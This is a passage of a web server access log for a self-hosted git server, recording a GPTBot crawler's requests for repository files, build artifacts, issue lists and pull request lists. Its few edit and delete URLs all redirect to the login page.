AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11487] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:19:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12564] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:19:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12765] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:19:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12608] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:19:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:19:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12569] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:19:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12609] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:19:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:19:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12569] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:19:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12612] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:19:03:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:19:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:19:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9853] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:03:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 1007] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 74.7.227.38] [Length 15726] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:19:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:03:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:19:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:19:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" 